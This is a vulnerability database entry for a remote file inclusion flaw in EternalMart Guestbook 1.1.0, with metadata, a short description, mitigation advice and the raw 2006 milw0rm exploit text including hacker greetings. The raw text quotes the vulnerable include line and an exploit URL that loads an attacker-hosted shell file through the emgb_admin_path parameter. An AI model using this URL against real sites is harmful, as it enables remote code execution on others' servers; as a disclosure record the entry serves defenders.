EternalMart Guestbook 1.1.0 Remote File Include

vendor:

EternalMart Guestbook

by:

mdx

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: EternalMart Guestbook

Affected Version From: 1.1.0

Affected Version To: 1.1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:eternalmart:eternalmart_guestbook:1.1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

EternalMart Guestbook 1.1.0 Remote File Include

Include vulnerability exists in the admin/auth.php file of EternalMart Guestbook 1.1.0. An attacker can exploit this vulnerability by sending a malicious URL in the emgb_admin_path parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Update to the latest version of EternalMart Guestbook.

Source

Exploit-DB raw data:

******************************************************************************************************
*EternalMart Guestbook 1.1.0********* [emgb_admin_path] ************************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
+admin/auth.php?                                                            *
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+      include("$emgb_admin_path/auth_func.php");                           *
+                                                                           *
+      download link :  http://www.vanta.ru/script/info.php?id=230&clas=0   *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/auth.php?emgb_admin_path=http://mdxshell.txt?  +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?              Hi , The_bat_hacker , How are you ? ;=)                                       *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-22]